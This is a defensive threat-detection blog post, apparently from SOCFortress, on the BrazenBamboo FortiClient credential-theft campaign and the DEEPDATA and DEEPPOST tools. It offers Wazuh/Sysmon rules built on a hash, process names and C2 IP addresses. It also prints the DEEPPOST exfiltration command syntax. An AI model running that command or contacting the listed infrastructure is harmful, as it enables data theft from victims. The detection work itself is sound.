FortiClient Vulnerability in Windows Systems — Exploitation to Steal VPN Credentials via DEEPDATA

SOCFortress
2 min readNov 20, 2024

--

Need Help?

The functionality discussed in this post, and so much more, are available via the SOCFortress platform. Let SOCFortress help you and your team keep your infrastructure secure.

Website: https://www.socfortress.co/

Contact Us: https://www.socfortress.co/contact_form.html

Intro

Threat intelligence vendor Volexity published research Friday that referenced a new zero-day vulnerability — one without a current CVE designation — that has enabled threat actors tracked as “BrazenBamboo” to steal credentials in instances of Fortinet’s Windows VPN client, FortiClient.

Reference: https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/

In this article we recommend detection rules to detect and alert on this exploit.

Malware Analysis

DEEPDATA post-exploitation tool

Volexity’s analysis began with discovery of an archive file named deepdata[.]zip, file hash:

SHA256:666a4c569d435d0e6bf9fa4d337d1bf014952b42cc6d20e797db6c9df92dd724

Detection rule:

  • Source: Wazuh Syscheck module
  • Rule ID: 554 (File added to the system.)
  <rule id="xxxx" level="12">
<if_sid>554</if_sid>
<field name="sha256_after">^666a4c569d435d0e6bf9fa4d337d1bf014952b42cc6d20e797db6c9df92dd724$</field>
<description>Suspicious file added to the system.</description>
</rule>
</group>

The DEEPDATA malware elements include the following:

  • data.dll DEEPDATA Loader
  • mod.dat DEEPDATA Virtual File System (VFS)
  • readme.txt File containing DEEPDATA Execution Options

Execution:

Detection rule:

  • Source: Sysmon Evt 1 (Process creation)
  • Process image + CMDLine
<rule id="xxxx" level="12">
<if_group>sysmon_event1</if_group>
<field name="win.eventdata.originalFileName" type="pcre2">(?i)rundll32\.exe</field>
<field name="win.eventdata.commandLine" type="pcre2">(?i)data\.dll</field>
<options>no_full_log</options>
<description>Suspicious rundll32 Execution</description>
</rule>

DEEPPOST post-exploitation exfiltration tool

Syntax:


localupload.exe c:\data_to_exfiltrate\ ip:port

Detection rule:

  • Source: Sysmon Evt 1 (Process creation)
  • Process image
<rule id="xxxx" level="12">
<if_group>sysmon_event1</if_group>
<field name="win.eventdata.originalFileName" type="pcre2">(?i)localupload\.exe</field>
<options>no_full_log</options>
<description>DeepPost Exfiltration Tool Detected</description>
</rule>

DEEPDATA C2 Infrastructure

Several C2 IP addresses mentioned in public reporting have overlaps with DEEPDATA infrastructure, including the following:

103.27.109[.]217

103.27.108[.]207

121.201.109[.]98

Detection rule:

  • Source: Sysmon Evt 3 (Network Connection)
  • DST IPs + DST Ports
<rule id="xxxx" level="12">
<if_group>sysmon_event3</if_group>
<field name="win.eventdata.destinationIp" type="pcre2">^103\.27\.109\.217$|^103\.27\.108\.207$|^121\.201\.109\.98$</field>
<field name="win.eventdata.destinationPort">^28443$|^28992$|^28993$</field>
<options>no_full_log</options>
<description>DeepPost Exfiltration Tool Detected</description>
</rule>

Need Help?

The functionality discussed in this post, and so much more, are available via the SOCFortress platform. Let SOCFortress help you and your team keep your infrastructure secure.

Website: https://www.socfortress.co/

Contact Us: https://www.socfortress.co/contact_form.html

--

--

SOCFortress
SOCFortress

Written by SOCFortress

SOCFortress is a SaaS company that unifies Observability, Security Monitoring, Threat Intelligence and Security Orchestration, Automation, and Response (SOAR).

No responses yet